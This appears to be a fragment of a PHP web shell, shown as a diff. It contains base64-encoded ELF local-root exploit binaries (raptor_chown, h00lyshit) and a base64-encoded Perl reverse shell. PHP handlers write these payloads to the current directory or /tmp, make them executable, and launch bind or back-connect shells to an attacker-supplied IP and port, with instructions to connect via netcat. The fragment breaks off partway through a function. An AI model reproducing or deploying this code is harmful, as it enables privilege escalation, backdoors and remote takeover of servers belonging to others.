+CAAAAAARABEA6gAAAACHBAgEAAAAEQAOAPEAAAAAAAAAyQEAABIAAAADAQAAAAAAABQAAAASAAAA +FgEAAACYBAgAAAAAEALx/ycBAAAEmAQIAAAAABECDwA0AQAAYIYECEQAAAASAAwARAEAAAAAAAA0 +AAAAEgAAAGABAAAAAAAAZgAAABIAAAByAQAAnIMECAAAAAASAAoAeAEAACCZBAgEAAAAEQAWAIoB +AABUhAQIAAAAABIADACRAQAAAJgECAAAAAAQAvH/pAEAABiGBAhIAAAAEgAMALQBAAAgmQQIAAAA +ABAA8f/AAQAABIUECBEBAAASAAwAxQEAAAAAAADVAAAAEgAAAOIBAAAAmAQIAAAAABAC8f/zAQAA +AJgECAAAAAAgAA8A/gEAAMiGBAgAAAAAEgANAAQCAAAAAAAAQwAAABIAAAAWAgAAAJgECAAAAAAQ +AvH/KgIAAAAAAADLAAAAEgAAADoCAAAgmQQIAAAAABAA8f9BAgAA7JgECAAAAAARABUAVwIAACiZ +BAgAAAAAEADx/1wCAAAAmAQIAAAAABAC8f9vAgAABIcECAQAAAARAA4AfgIAAAAAAAAkAAAAEgAA +AJECAAAAmAQIAAAAABAADwCeAgAAAAAAAAAAAAAgAAAAsgIAAACYBAgAAAAAEALx/8gCAAAAAAAA +AAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1Jf +TElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4 +AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pD +Ul9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAcmFwdG9yX2Nob3duLmMAY2hvd25AQEdMSUJD +XzIuMQBfRFlOQU1JQwBfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZnByaW50ZkBAR0xJQkNfMi4w +AF9fZmluaV9hcnJheV9lbmQAX19kc29faGFuZGxlAF9fbGliY19jc3VfZmluaQBfX2Vycm5vX2xv +Y2F0aW9uQEBHTElCQ18yLjAAc3lzdGVtQEBHTElCQ18yLjAAX2luaXQAc3RkZXJyQEBHTElCQ18y +LjAAX3N0YXJ0AF9fZmluaV9hcnJheV9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQA +bWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAF9faW5pdF9hcnJheV9lbmQAZGF0YV9z +dGFydABfZmluaQBnZXRnaWRAQEdMSUJDXzIuMABfX3ByZWluaXRfYXJyYXlfZW5kAGV4aXRAQEdM +SUJDXzIuMABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9lbmQAX19pbml0X2FycmF5X3N0 +YXJ0AF9JT19zdGRpbl91c2VkAHNwcmludGZAQEdMSUJDXzIuMABfX2RhdGFfc3RhcnQAX0p2X1Jl +Z2lzdGVyQ2xhc3NlcwBfX3ByZWluaXRfYXJyYXlfc3RhcnQAX19nbW9uX3N0YXJ0X18A"; + +$h00lyshit="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAgIcECDQAAADYEgAAAAAAADQAIAAHACgAGwAYAAYAAAA0 +AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEA +AAABAAAAAAAAAACABAgAgAQIbg4AAG4OAAAFAAAAABAAAAEAAAAAEAAAAJAECACQBAhYAQAAxAgA +AAYAAAAAEAAAAgAAABAQAAAQkAQIEJAECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQI +IAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1s +aW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAdAAAADgAAAAAA +AAAaAAAAAAAAAAkAAAARAAAAAQAAABAAAAATAAAAAwAAABsAAAALAAAAAAAAABkAAAAPAAAAHAAA +AAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAA +AAAAAAcAAAAAAAAAAAAAAAAAAAAKAAAACAAAAAwAAAASAAAADQAAABYAAAAXAAAAGAAAABQAAAAV +AAAABgAAAAAAAAAAAAAAAAAAAAAAAAAhAAAAAAAAAAgAAAASAAAAYgAAAAAAAABGAAAAEgAAADUA +AAAAAAAAyQEAABIAAABdAAAAAAAAAFAAAAASAAAAPAAAAAAAAAC+AAAAEgAAAEMAAAAAAAAANgAA +ABIAAAAaAAAAAAAAAFcAAAASAAAASAAAAAAAAAA6AAAAEgAAACgAAAAAAAAASAAAABIAAAC2AAAA +AAAAAC4AAAASAAAAEwAAAGCRBAgEAAAAEQAWAIQAAABkkQQIBAAAABEAFgALAAAAAAAAAHwAAAAS +AAAAwgAAAAAAAAAhAQAAEgAAAHAAAAAAAAAAeQAAABIAAACfAAAAAAAAANUAAAASAAAATgAAAAAA +AAAnAAAAEgAAAH0AAAAAAAAAKQAAABIAAAAuAAAAAAAAADcAAAASAAAANgAAAHuIBAgvAAAAEgAM +ALEAAAAAAAAAfAAAABIAAACLAAAAAAAAAMsAAAASAAAAdQAAAAAAAADJAAAAEgAAAGkAAAAAAAAA +QwAAABIAAACQAAAA6I0ECAQAAAARAA4AVQAAAAAAAAA8AAAAEgAAAHwAAAAAAAAAJAAAABIAAADL +AAAAAAAAAAAAAAAgAAAAAGxpYmMuc28uNgB3YWl0cGlkAHN0ZG91dABleGVjdmUAZ2V0cGlkAHBy +Y3RsAG1lbWNweQBwZXJyb3IAZmZsdXNoAG1tYXAAY2htb2QAc3RyY2F0AG1hZHZpc2UAZm9yawBz +dHJkdXAAbWVtc2V0AG5pY2UAZ2V0Y3dkAHNwcmludGYAc3RkZXJyAGV4aXQAX0lPX3N0ZGluX3Vz +ZWQAX19saWJjX3N0YXJ0X21haW4Ab3BlbgBzY2hlZF95aWVsZABfX2Z4c3RhdABfX2dtb25fc3Rh +cnRfXwBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEA +AgACAAIAAgABAAIAAgAAAAAAAQABAAEAAAAQAAAAAAAAABBpaQ0AAAIA2gAAAAAAAABUkQQIBhwA +AGCRBAgFCwAAZJEECAUMAAD4kAQIBwEAAPyQBAgHAgAAAJEECAcDAAAEkQQIBwQAAAiRBAgHBQAA +DJEECAcGAAAQkQQIBwcAABSRBAgHCAAAGJEECAcJAAAckQQIBwoAACCRBAgHDQAAJJEECAcOAAAo +kQQIBw8AACyRBAgHEAAAMJEECAcRAAA0kQQIBxIAADiRBAgHEwAAPJEECAcVAABAkQQIBxYAAESR +BAgHFwAASJEECAcYAABMkQQIBxoAAFCRBAgHGwAAVYnlg+wI6LEBAADoDAIAAOinBwAAycMA/zXw +kAQI/yX0kAQIAAAAAP8l+JAECGgAAAAA6eD/////JfyQBAhoCAAAAOnQ/////yUAkQQIaBAAAADp +wP////8lBJEECGgYAAAA6bD/////JQiRBAhoIAAAAOmg/////yUMkQQIaCgAAADpkP////8lEJEE +CGgwAAAA6YD/////JRSRBAhoOAAAAOlw/////yUYkQQIaEAAAADpYP////8lHJEECGhIAAAA6VD/ +////JSCRBAhoUAAAAOlA/////yUkkQQIaFgAAADpMP////8lKJEECGhgAAAA6SD/////JSyRBAho +aAAAAOkQ/////yUwkQQIaHAAAADpAP////8lNJEECGh4AAAA6fD+////JTiRBAhogAAAAOng/v// +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 +ZTogYmluYXJ5IDxiaWcgZmlsZSBuYW1lPgAKcHJlcGFyaW5nAC8AZXhlY3ZlwAAADohQQIDQAAAMiNBAgEAAAASIEECAUAAADYgwQIBgAAAAiCBAgK +AAAA5AAAAAsAAAAQAAAAFQAAAAAAAAADAAAA7JAECAIAAAC4AAAAFAAAABEAAAAXAAAAMIUECBEA +AAAYhQQIEgAAABgAAAATAAAACAAAAP7//2/4hAQI////bwEAAADw//9vvIQECAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAA +EJAECAAAAAAAAAAAFoYECCaGBAg2hgQIRoYECFaGBAhmhgQIdoYECIaGBAiWhgQIpoYECLaGBAjG +hgQI1oYECOaGBAj2hgQIBocECBaHBAgmhwQINocECEaHBAhWhwQIZocECHaHBAgAAAAAAAAAAAAA +AAAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2Up +AABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkA +AEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAA +LnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5 +bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBs +dAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3Rv +cnMALmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAAABSBBAgUAQAAEwAAAAAAAAAAAAAAAQAAAAAA +AAAjAAAABwAAAAIAAAAogQQIKAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAMQAAAAUAAAACAAAASIEE +CEgBAADAAAAABAAAAAAAAAAEAAAABAAAADcAAAALAAAAAgAAAAiCBAgIAgAA0AEAAAUAAAABAAAA +BAAAABAAAAA/AAAAAwAAAAIAAADYgwQI2AMAAOQAAAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28C +AAAAvIQECLwEAAA6AAAABAAAAAAAAAACAAAAAgAAAFQAAAD+//9vAgAAAPiEBAj4BAAAIAAAAAUA +AAABAAAABAAAAAAAAABjAAAACQAAAAIAAAAYhQQIGAUAABgAAAAEAAAAAAAAAAQAAAAIAAAAbAAA +AAkAAAACAAAAMIUECDAFAAC4AAAABAAAAAsAAAAEAAAACAAAAHUAAAABAAAABgAAAOiFBAjoBQAA +FwAAAAAAAAAAAAAABAAAAAAAAABwAAAAAQAAAAYAAAAAhgQIAAYAAIABAAAAAAAAAAAAAAQAAAAE +AAAAewAAAAEAAAAGAAAAgIcECIAHAABIBgAAAAAAAAAAAAAEAAAAAAAAAIEAAAABAAAABgAAAMiN +BAjIDQAAGwAAAAAAAAAAAAAABAAAAAAAAACHAAAAAQAAAAIAAADkjQQI5A0AAIoAAAAAAAAAAAAA +AAQAAAAAAAAAjwAAAAEAAAADAAAAAJAECAAQAAAMAAAAAAAAAAAAAAAEAAAAAAAAAJUAAAABAAAA +AgAAAAyQBAgMEAAABAAAAAAAAAAAAAAABAAAAAAAAACfAAAABgAAAAMAAAAQkAQIEBAAAMgAAAAF +AAAAAAAAAAQAAAAIAAAAqAAAAAEAAAADAAAA2JAECNgQAAAIAAAAAAAAAAAAAAAEAAAAAAAAAK8A +AAABAAAAAwAAAOCQBAjgEAAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAAAQAAAAMAAADokAQI6BAA +AAQAAAAAAAAAAAAAAAQAAAAAAAAAuwAAAAEAAAADAAAA7JAECOwQAABsAAAAAAAAAAAAAAAEAAAA +BAAAAMAAAAAIAAAAAwAAAGCRBAhgEQAAZAcAAAAAAAAAAAAAIAAAAAAAAADFAAAAAQAAAAAAAAAA +AAAAYBEAAKgAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAgSAADOAAAAAAAAAAAA +AAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAQFwAAoAYAABoAAAAzAAAABAAAABAAAAAJAAAAAwAA +AAAAAAAAAAAAsB0AABwEAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQI +AAAAAAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAAAIggQIAAAAAAMABAAA +AAAA2IMECAAAAAADAAUAAAAAALyEBAgAAAAAAwAGAAAAAAD4hAQIAAAAAAMABwAAAAAAGIUECAAA +AAADAAgAAAAAADCFBAgAAAAAAwAJAAAAAADohQQIAAAAAAMACgAAAAAAAIYECAAAAAADAAsAAAAA +AICHBAgAAAAAAwAMAAAAAADIjQQIAAAAAAMADQAAAAAA5I0ECAAAAAADAA4AAAAAAACQBAgAAAAA +AwAPAAAAAAAMkAQIAAAAAAMAEAAAAAAAEJAECAAAAAADABEAAAAAANiQBAgAAAAAAwASAAAAAADg +kAQIAAAAAAMAEwAAAAAA6JAECAAAAAADABQAAAAAAOyQBAgAAAAAAwAVAAAAAABgkQQIAAAAAAMA +FgAAAAAAAAAAAAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAA +AAAAAAADABoAAQAAAKSHBAgAAAAAAgAMABEAAAAAAAAAAAAAAAQA8f8cAAAA2JAECAAAAAABABIA +KgAAAOCQBAgAAAAAAQATADgAAADokAQIAAAAAAEAFABFAAAACJAECAAAAAABAA8ASQAAAGiRBAgB +AAAAAQAWAFUAAADIhwQIAAAAAAIADABrAAAABIgECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/3cA +AADckAQIAAAAAAEAEgCEAAAA5JAECAAAAAABABMAkQAAAAyQBAgAAAAAAQAQAJ8AAADokAQIAAAA +AAEAFACrAAAApI0ECAAAAAACAAwAwQAAAAAAAAAAAAAABADx/80AAAByiAQIAAAAAAAADADRAAAA +YogECAAAAAAAAAwA1QAAAMCYBAgEAAAAAQAWANcAAADAlwQIAAEAAAEAFgDZAAAAoJEECAAEAAAB +ABYA2wAAAKCVBAgQAAAAAQAWAN0AAACAkQQIIAAAAAEAFgDgAAAAwJUECAACAAABABYA4gAAAAAA +AAAIAAAAEgAAAPQAAAAQkAQIAAAAABEAEQD9AAAAAAAAAEYAAAASAAAADwEAAOSNBAgEAAAAEQAO +ABYBAAAAAAAAyQEAABIAAAAoAQAAAAAAAFAAAAASAAAAOAEAAAAAAAC+AAAAEgAAAEoBAAAAkAQI +AAAAABAC8f9bAQAABJAECAAAAAARAg8AaAEAAAAAAAA2AAAAEgAAAHgBAAA8jQQIRAAAABIADACI +AQAAAAAAAFcAAAASAAAAmgEAAAAAAAA6AAAAEgAAAKsBAADohQQIAAAAABIACgCxAQAAAAAAAEgA +AAASAAAAwgEAAAAAAAAuAAAAEgAAANkBAACAjQQIIgAAACICDADfAQAAYJEECAQAAAARABYA8QEA +AGSRBAgEAAAAEQAWAAMCAAAAAAAAfAAAABIAAAAWAgAAgIcECAAAAAASAAwAHQIAAAAAAAAhAQAA +EgAAADECAAAAAAAAeQAAABIAAABBAgAAAJAECAAAAAAQAvH/VAIAAPSMBAhIAAAAEgAMAGQCAABY +kQQIAAAAABAA8f9wAgAAtYoECD0CAAASAAwAdQIAAAAAAADVAAAAEgAAAJICAAAAkAQIAAAAABAC +8f+jAgAAAAAAACcAAAASAAAAtQIAAACQBAgAAAAAIAAPAMACAAAAAAAAKQAAABIAAADSAgAAyI0E +CAAAAAASAA0A2AIAAAAAAAA3AAAAEgAAAOoCAAB7iAQILwAAABIADADwAgAAAJAECAAAAAAQAvH/ +BAMAADCIBAgAAAAAEAAMAA0DAAAAAAAAfAAAABIAAAAdAwAAAAAAAMsAAAASAAAALQMAAFiRBAgA +AAAAEADx/zQDAADskAQIAAAAABEAFQBKAwAAxJgECAAAAAAQAPH/TwMAAAAAAADJAAAAEgAAAGED +AAAAAAAAQwAAABIAAABzAwAAeogECAAAAAAQAAwAfgMAAACQBAgAAAAAEALx/5EDAACAjQQIIgAA +ABICDACZAwAA6I0ECAQAAAARAA4AqAMAAAAAAAA8AAAAEgAAALsDAAAAAAAAJAAAABIAAADOAwAA +AJAECAAAAAAQAA8A2wMAAAAAAAAAAAAAIAAAAO8DAACqiAQICwIAABIADAD3AwAAAJAECAAAAAAQ +AvH/DQQAAAAAAAAAAAAAIAAAAABjYWxsX2dtb25fc3RhcnQAY3J0c3R1ZmYuYwBfX0NUT1JfTElT +VF9fAF9fRFRPUl9MSVNUX18AX19KQ1JfTElTVF9fAHAuMABjb21wbGV0ZWQuMQBfX2RvX2dsb2Jh +bF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRFRPUl9FTkRfXwBfX0ZSQU1F +X0VORF9fAF9fSkNSX0VORF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABoMDBseXNoaXQuYwBjbWQA +YXJnAGMAdABlAGEAZXgAYgBnZXRwaWRAQEdMSUJDXzIuMABfRFlOQU1JQwBzdHJkdXBAQEdMSUJD +XzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAGZmbHVzaEBAR0xJ +QkNfMi4wAF9fZmluaV9hcnJheV9lbmQAX19kc29faGFuZGxlAG1tYXBAQEdMSUJDXzIuMABfX2xp +YmNfY3N1X2ZpbmkAZXhlY3ZlQEBHTElCQ18yLjAAY2htb2RAQEdMSUJDXzIuMABfaW5pdABwcmN0 +bEBAR0xJQkNfMi4wAHNjaGVkX3lpZWxkQEBHTElCQ18yLjAAZnN0YXQAc3Rkb3V0QEBHTElCQ18y +LjAAc3RkZXJyQEBHTElCQ18yLjAAd2FpdHBpZEBAR0xJQkNfMi4wAF9zdGFydABfX2Z4c3RhdEBA +R0xJQkNfMi4wAG5pY2VAQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9p +bml0AF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRf +YXJyYXlfZW5kAHN0cmNhdEBAR0xJQkNfMi4wAGRhdGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAA +X2ZpbmkAbWVtY3B5QEBHTElCQ18yLjAAZXJyb3IAX19wcmVpbml0X2FycmF5X2VuZABfX2V4Y29k +ZQBvcGVuQEBHTElCQ18yLjAAZXhpdEBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9U +QUJMRV8AX2VuZABnZXRjd2RAQEdMSUJDXzIuMABtZW1zZXRAQEdMSUJDXzIuMABfX2V4Y29kZV9l +AF9faW5pdF9hcnJheV9zdGFydABfX2ZzdGF0AF9JT19zdGRpbl91c2VkAG1hZHZpc2VAQEdMSUJD +XzIuMABzcHJpbnRmQEBHTElCQ18yLjAAX19kYXRhX3N0YXJ0AF9Kdl9SZWdpc3RlckNsYXNzZXMA +ZXhwbG9pdABfX3ByZWluaXRfYXJyYXlfc3RhcnQAX19nbW9uX3N0YXJ0X18A"; + + +$back_connect_c=""; + +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +$backdoor=""; + +function checkproxyhost(){ +$host = getenv("HTTP_HOST"); +$filename = '/tmp/.setan/xh'; +if (file_exists($filename)) { +$_POST['proxyhostmsg']="

Success!

$host:6543

Note: If '$host' have a good firewall or IDS installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.

"; +} else { +$_POST['proxyhostmsg']="

Failed!

Note: If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.

"; + } +} + +if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) +{ + $ip = gethostbyname($_SERVER["HTTP_HOST"]); + $por = $_POST['backconnectport']; + if(is_writable(".")){ + cfb("shbd",$backdoor); + ex("chmod 777 shbd"); + $cmd = "./shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n

Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n
Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command 'nc $ip $por'.$data"; + }else{ + cfb("/tmp/shbd",$backdoor); + ex("chmod 777 /tmp/shbd"); + $cmd = "./tmp/shbd $por"; + exec("$cmd > /dev/null &"); + $scan = myshellexec("ps aux"); + if(eregi("./shbd $por",$scan)){ $data = ("\n

Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n
Process not found running, backdoor not setup successfully."); } + $_POST['backcconnmsg']="To connect, use netcat and give it the command 'nc $ip $por'.$data"; +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) + +{ + if(is_writable(".")){ + cf("back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + if (file_exists("back")) { unlink("back"); } + }else{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + if (file_exists("/tmp/back")) { unlink("/tmp/back"); } +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) +{ + if(is_writable(".")){ + cf("backc",$back_connect_c); + ex("chmod 777 backc"); + //$blah = ex("gcc back.c -o backc"); + $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("backc")) { unlink("backc"); } + }else{ + ex("chmod 777 /tmp/backc"); + cf("/tmp/backc",$back_connect_c); + //$blah = ex("gcc -o /tmp/backc /tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function cfb($fname,$text) +{ + $w_file=@fopen($fname,"w") or bberr(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function err() +{ 